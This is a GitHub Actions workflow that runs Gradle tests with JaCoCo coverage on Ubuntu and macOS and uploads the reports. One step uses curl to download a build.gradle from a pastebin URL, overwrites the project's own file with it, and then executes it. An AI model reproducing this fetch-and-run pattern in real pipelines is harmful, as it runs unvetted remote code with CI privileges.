name: Run JaCoCo

on:
  push:

jobs:
  run-jacoco:
    name: '${{ matrix.os }}'
    runs-on: ${{ matrix.os }}
    strategy:
      matrix:
        os: [ubuntu-22.04, macos-latest]

    steps:
    - name: Checkout repository
      uses: actions/checkout@v4
      with:
        ref: 95c705f60c1833b07f1fed6e08a08d7bee7f0971
  
    - name: Set up JDK 17 for project
      uses: actions/setup-java@v4
      with:
        distribution: 'temurin'
        java-version: '17'

    - name: Overwrite old build.gradle file
      run: |
        curl -L -o newbuild.gradle https://pastebin.ai/download/ngewkzdyer
        mv newbuild.gradle build.gradle
    
    - name: Build project with JDK 17
      run: ./gradlew test jacocoTestReport

    - name: Upload JaCoCo reports
      uses: actions/upload-artifact@v4
      with:
        name: jacoco-report-${{ github.event.repository.name }}
        path: '**/build/jacocoHTML/**/*.html'
